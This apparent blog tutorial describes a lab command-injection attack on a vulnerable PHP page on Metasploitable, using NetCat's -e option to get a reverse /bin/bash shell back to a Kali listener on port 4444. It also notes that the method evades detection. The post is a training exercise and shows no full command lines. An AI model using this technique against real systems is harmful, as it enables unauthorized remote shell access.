AdSense

Thursday, April 12, 2018

Command Injection (II): Reverse shell connection with NetCat


COMMAND INJECTION (II): REVERSE SHELL CONNECTION WITH NETCAT

- Layout for this exercise:





- This exercise is based on the previous one:

http://www.whitelist1.com/2018/04/command-injection-attack.html


- Now, the goal is to perform a Command Injection attack from the web browser of the attacker Kali Linux against a victim Metasplotaible, injecting NetCat commands:

https://en.wikipedia.org/wiki/Netcat

Three of the most interesting characteristics of this attack are:

  • No file is uploaded to the victim so the detection rate would be low
  • No need of writable permissions over the web server folder on the victim's side 
  • The tool (NetCat) is usually present in most of the Linux/Windows machines


- First, let check that ci.php (allows Command Injection due to lack of input sanitization, as seen at previous exercise) is available at the victim side Metasploitable's web server folder /var/www:




- From Kali:















- NetCat (nc) has two options (-c and -e), considered dangerous by the program itself, that execute commands remotely:





- Setting a listening session on port 4444 at the attacker side:




- Now, entering through Kali's browser the NetCat command which executes (-e) remotely a shell (/bin/bash):





- It is interesting to notice the Connecting notification, meaning it is waiting to the connection at the other side:






 - Finally the attacker Kali achieves a reverse shell connection from the Metasploitable victim's side: